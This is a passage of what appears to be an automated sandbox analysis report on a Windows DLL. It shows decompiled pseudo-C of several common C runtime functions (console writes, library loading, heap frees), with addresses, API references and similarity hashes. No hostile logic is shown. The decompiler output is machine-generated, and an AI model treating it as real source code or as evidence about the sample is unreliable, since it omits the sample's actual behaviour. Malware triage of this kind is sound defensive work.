									 *((char*)(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E6E9EE7D9( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E6E9EE7D9();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E9E9ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x6e9f092c
0x6e9f0933
0x6e9f0936
0x6e9f093e
0x6e9f0941
0x6e9f094e
0x6e9f0951
0x6e9f0954
0x6e9f095b
0x6e9f0963
0x6e9f0966
0x6e9f0969
0x6e9f096f
0x6e9f0971
0x6e9f0978
0x6e9f0982
0x6e9f0984
0x6e9f0987
0x6e9f098a
0x6e9f098d
0x6e9f0990
0x6e9f0993
0x6e9f0999
0x6e9f0ca4
0x6e9f0ca4
0x00000000
0x6e9f099f
0x6e9f09a7
0x6e9f09aa
0x6e9f09b0
0x6e9f09b3
0x6e9f09ba
0x6e9f09c1
0x6e9f09c4
0x00000000
0x00000000
0x6e9f09cd
0x6e9f09d2
0x6e9f09d4
0x6e9f09d7
0x6e9f09dc
0x6e9f09e0
0x00000000
0x00000000
0x00000000
0x6e9f09e0
0x6e9f09e5
0x6e9f09e7
0x6e9f09ec
0x6e9f0aa6
0x6e9f0aad
0x6e9f0aae
0x6e9f0ab1
0x6e9f0ab3
0x6e9f0c57
0x6e9f0c59
0x00000000
0x6e9f0c5b
0x6e9f0c5b
0x6e9f0c5e
0x6e9f0c6d
0x6e9f0c71
0x6e9f0c72
0x6e9f0c72
0x00000000
0x6e9f0c76
0x6e9f0ab9
0x6e9f0abb
0x6e9f0ac1
0x6e9f0ac4
0x6e9f0ad0
0x6e9f0ad9
0x6e9f0ae4
0x6e9f0ae9
0x6e9f0aec
0x6e9f0aef
0x00000000
0x6e9f0af5
0x6e9f0af5
0x00000000
0x6e9f0af5
0x6e9f0aef
0x6e9f09f2
0x6e9f0a01
0x6e9f0a02
0x6e9f0a05
0x6e9f0a08
0x6e9f0a0d
0x6e9f0c23
0x6e9f0c25
0x6e9f0c27
0x6e9f0c29
0x6e9f0c33
0x6e9f0c3b
0x6e9f0c3d
0x6e9f0c3e
0x6e9f0c42
0x6e9f0c45
0x6e9f0c45
0x6e9f0c49
0x6e9f0c49
0x6e9f0c49
0x6e9f0c4c
0x6e9f0c4c
0x6e9f0c4c
0x6e9f0c4e
0x6e9f0c4e
0x6e9f0c52
0x6e9f0a13
0x6e9f0a13
0x6e9f0a16
0x6e9f0a18
0x6e9f0a1b
0x6e9f0a1e
0x6e9f0a22
0x6e9f0a23
0x6e9f0a27
0x6e9f0a2a
0x6e9f0a2f
0x6e9f0a39
0x6e9f0a3e
0x6e9f0a41
0x6e9f0a44
0x6e9f0a44
0x6e9f0a47
0x6e9f0a4a
0x6e9f0a4c
0x6e9f0a55
0x6e9f0a59
0x6e9f0a5a
0x6e9f0a5e
0x6e9f0a64
0x6e9f0a6d
0x6e9f0a7a
0x6e9f0a81
0x6e9f0a85
0x6e9f0a90
0x6e9f0a95
0x6e9f0a9b
0x00000000
0x6e9f0aa1
0x6e9f0af8
0x6e9f0af9
0x6e9f0b7c
0x6e9f0b83
0x6e9f0b8b
0x6e9f0b93
0x6e9f0b98
0x6e9f0b9b
0x6e9f0ba0
0x00000000
0x6e9f0ba6
0x6e9f0bbb
0x6e9f0c9b
0x6e9f0ca1
0x00000000
0x6e9f0bc1
0x6e9f0bca
0x6e9f0bcc
0x6e9f0bd2
0x00000000
0x6e9f0bd8
0x6e9f0bdc
0x6e9f0c12
0x6e9f0c15
0x00000000
0x6e9f0c1b
0x6e9f0c1b
0x00000000
0x6e9f0c1b
0x6e9f0bde
0x6e9f0be0
0x6e9f0be2
0x6e9f0bfb
0x00000000
0x6e9f0c01
0x6e9f0c05
0x00000000
0x6e9f0c0b
0x6e9f0c0b
0x6e9f0c0e
0x6e9f0c0f
0x00000000
0x6e9f0c0f
0x6e9f0c05
0x6e9f0bfb
0x6e9f0bdc
0x6e9f0bd2
0x6e9f0bbb
0x6e9f0ba0
0x6e9f0a9b
0x6e9f0a0d
0x00000000
0x6e9f0afd
0x6e9f0afd
0x6e9f0b01
0x6e9f0b04
0x6e9f0b26
0x6e9f0b29
0x6e9f0b2e
0x6e9f0b32
0x6e9f0b36
0x6e9f0b64
0x6e9f0b66
0x00000000
0x6e9f0b38
0x6e9f0b38
0x6e9f0b38
0x6e9f0b3b
0x6e9f0b3e
0x6e9f0b41
0x6e9f0c78
0x6e9f0c7b
0x6e9f0c7e
0x6e9f0c88
0x6e9f0c93
0x6e9f0c98
0x00000000
0x6e9f0b47
0x6e9f0b4e
0x6e9f0b53
0x6e9f0b56
0x6e9f0b59
0x00000000
0x6e9f0b5f
0x6e9f0b5f
0x00000000
0x6e9f0b5f
0x6e9f0b59
0x6e9f0b41
0x6e9f0b06
0x6e9f0b0a
0x6e9f0b0d
0x6e9f0b12
0x6e9f0b18
0x6e9f0b1a
0x6e9f0b21
0x6e9f0b67
0x6e9f0b6a
0x6e9f0b6b
0x6e9f0b70
0x6e9f0b73
0x6e9f0b76
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f0b76
0x00000000
0x6e9f0b04
0x6e9f099f
0x6e9f0ca7
0x6e9f0ca7
0x6e9f0ca9
0x6e9f0cac
0x6e9f0cac
0x6e9f0cac
0x6e9f0cac
0x6e9f0cbe
0x6e9f0cc0
0x6e9f0cc1
0x6e9f0cc2
0x6e9f0ccc

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E9F0969
__fassign.LIBCMT ref: 6E9F0B4E
__fassign.LIBCMT ref: 6E9F0B6B
WriteFile.KERNEL32(?,6E9EE286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0BB3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E9F0BF3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0C9B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
Instruction ID: 3eae60b5d78e60e4841c69526ff082b3065ccf398e2371a6c8a70d72337de221
Opcode Fuzzy Hash: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
Instruction Fuzzy Hash: DAC18A75D04299DFDB01CFE8C9909EDBBB9AF49314F28416AE859BB341E231D942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EAD94 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9EAD94(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e9fc030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E9EBF60(_t13, __eflags,  *0x6e9fc030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E9EBF9B(_t14, __eflags,  *0x6e9fc030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E9ED58B();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, 0);
								} else {
									_t8 = E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E9EC2B0(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e9ead94
0x6e9ead9b
0x6e9eadae
0x6e9eadb5
0x6e9eadb7
0x6e9eadb8
0x6e9eadbb
0x6e9eadd4
0x6e9eadd4
0x6e9eadbd
0x6e9eadbd
0x6e9eadbf
0x6e9eadc9
0x6e9eadd0
0x6e9eadd2
0x6e9eadd9
0x6e9eade2
0x6e9eade5
0x6e9eade6
0x6e9eade8
0x6e9eadfc
0x6e9eadfc
0x6e9eae05
0x6e9eadea
0x6e9eadf1
0x6e9eadf7
0x6e9eadf8
0x6e9eadfa
0x6e9eae0e
0x6e9eae10
0x6e9eae10
0x00000000
0x00000000
0x00000000
0x6e9eadfa
0x6e9eae13
0x00000000
0x00000000
0x00000000
0x6e9eadd2
0x6e9eadbf
0x6e9eae1b
0x6e9eae25
0x6e9ead9d
0x6e9ead9f
0x6e9ead9f

APIs

GetLastError.KERNEL32(00000001,?,6E9EA952,6E9E8F01,6E9E92CE,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF), ref: 6E9EADA2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9EADB0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9EADC9
SetLastError.KERNEL32(00000000,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF,?,00000001,?), ref: 6E9EAE1B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
Instruction ID: a08299f0d3fe9d099f2b7ba85a068d092dde37482075a5219591980b5d139d1b
Opcode Fuzzy Hash: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
Instruction Fuzzy Hash: A401687211DB125EAB1719F47C8064B2B7CEF62A7D320062DF720598E4EF91C8425D48

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EF217 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EF217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E9ED437(GetLastError());
									_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E9EF2DE(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E9ED437(GetLastError());
						_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E9EF2DE(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E9EF305(_a8);
				return 0;
			}

0x6e9ef21d
0x6e9ef222
0x6e9ef236
0x6e9ef239
0x6e9ef26b
0x6e9ef273
0x6e9ef275
0x6e9ef28e
0x6e9ef291
0x6e9ef294
0x6e9ef2a2
0x6e9ef2b1
0x6e9ef2b9
0x6e9ef2bb
0x6e9ef2d4
0x6e9ef2d7
0x6e9ef2d7
0x6e9ef2bd
0x6e9ef2c4
0x6e9ef2cf
0x6e9ef2cf
0x6e9ef2d9
0x6e9ef2da
0x00000000
0x6e9ef2da
0x6e9ef299
0x6e9ef29e
0x6e9ef2a0
0x00000000
0x00000000
0x00000000
0x6e9ef2a0
0x6e9ef27e
0x6e9ef289
0x00000000
0x6e9ef289
0x6e9ef23b
0x6e9ef23e
0x6e9ef241
0x6e9ef254
0x6e9ef257
0x6e9ef259
0x6e9ef25b
0x00000000
0x6e9ef25b
0x6e9ef247
0x6e9ef24c
0x6e9ef24e
0x00000000
0x00000000
0x00000000
0x6e9ef24e
0x6e9ef227
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E9EF21C

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
Instruction ID: b0995af1a6d7e798c17c290bf85a6399c1d5a9b62cb3d140d595492cf179ea5a
Opcode Fuzzy Hash: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
Instruction Fuzzy Hash: 4221A175604605AFA7029FF5AC40D86776CEF9136C7208916EA3996F80E731EC008EA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EBE07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EBE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e9fd3ec + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e9f5e38 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E9ED618(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e9ebe0e
0x6e9ebe82
0x6e9ebe13
0x6e9ebe15
0x6e9ebe1c
0x6e9ebe20
0x6e9ebe29
0x6e9ebe38
0x6e9ebe41
0x6e9ebe45
0x6e9ebe8e
0x6e9ebe90
0x6e9ebe94
0x6e9ebe97
0x6e9ebe97
0x6e9ebe9d
0x6e9ebe9d
0x6e9ebe89
0x6e9ebe8d
0x6e9ebe8d
0x6e9ebe47
0x6e9ebe50
0x6e9ebe7a
0x6e9ebe7d
0x6e9ebe7f
0x6e9ebe7f
0x00000000
0x6e9ebe7f
0x6e9ebe52
0x6e9ebe5d
0x6e9ebe62
0x6e9ebe67
0x00000000
0x00000000
0x6e9ebe6e
0x6e9ebe74
0x6e9ebe78
0x00000000
0x00000000
0x00000000
0x6e9ebe78
0x6e9ebe25
0x00000000
0x00000000
0x00000000
0x6e9ebe27
0x6e9ebe87
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E9EBEC8,00000000,?,00000001,00000000,?,6E9EBF3F,00000001,FlsFree,6E9F5EF4,FlsFree,00000000), ref: 6E9EBE97

Strings

api-ms-, xrefs: 6E9EBE57

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
Instruction ID: 5f3587cbcc2c5801bae0dc8d3c262c3b49f641da6bc8ce5ea98df00014e845f3
Opcode Fuzzy Hash: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
Instruction Fuzzy Hash: B111A732A45B21BBDB734AA8AC54B4D37B8AF02760F154554FB15E7688E760ED008ED0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC8EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6E9EC8EA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e9f51b8(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e9ec8f0
0x6e9ec8f4
0x6e9ec8ff
0x6e9ec907
0x6e9ec912
0x6e9ec918
0x6e9ec91c
0x6e9ec923
0x6e9ec929
0x6e9ec929
0x6e9ec92b
0x6e9ec930
0x00000000
0x6e9ec935
0x6e9ec93c

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC8FF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9EC912
FreeLibrary.KERNEL32(00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC935

Strings

mscoree.dll, xrefs: 6E9EC8F8
CorExitProcess, xrefs: 6E9EC90A

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
Instruction ID: af51d2082a6820cd2bb1570d1c396cdb3afb29179ce201945b192d02d88be5bd
Opcode Fuzzy Hash: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
Instruction Fuzzy Hash: 9BF08C30605619FBDF02AB91DC19B9E7FAAEF49759F108060F942A5150CB30DE41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F190B Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F190B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e9fc708; // 0x6e9fc758
					if(_t23 != 0) {
						E6E9EDC0E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e9fc70c; // 0x6e9fd9f4
					if(_t24 != 0) {
						E6E9EDC0E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e9fc710; // 0x6e9fd9f4
					if(_t25 != 0) {
						E6E9EDC0E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e9fc738; // 0x6e9fc75c
					if(_t26 != 0) {
						E6E9EDC0E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e9fc73c; // 0x6e9fd9f8
					if(_t27 != 0) {
						return E6E9EDC0E(_t6);
					}
				}
				return _t6;
			}

0x6e9f1911
0x6e9f1916
0x6e9f191a
0x6e9f1920
0x6e9f1923
0x6e9f1928
0x6e9f192c
0x6e9f1932
0x6e9f1935
0x6e9f193a
0x6e9f193e
0x6e9f1944
0x6e9f1947
0x6e9f194c
0x6e9f1950
0x6e9f1956
0x6e9f1959
0x6e9f195e
0x6e9f195f
0x6e9f1962
0x6e9f1968
0x00000000
0x6e9f1970
0x6e9f1968
0x6e9f1973

APIs

_free.LIBCMT ref: 6E9F1923

Part of subcall function 6E9EDC0E: HeapFree.KERNEL32(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F1935
_free.LIBCMT ref: 6E9F1947
_free.LIBCMT ref: 6E9F1959
_free.LIBCMT ref: 6E9F196B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6d73d7c277252b29f1ce7918c953b548205e2493a288742a2f175cafde69d6df
Instruction ID: ac3513a494e45ed96d28671c8c487141a8634faf1fa6f909da9fcd4d07e118ec
Opcode Fuzzy Hash: 6d73d7c277252b29f1ce7918c953b548205e2493a288742a2f175cafde69d6df
Instruction Fuzzy Hash: 68F06D71948605DB8A40CAE9F292C5B73EDEF82760B604C05F165DBA01CB30F8C48FE8

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EEB9B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E9EEB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
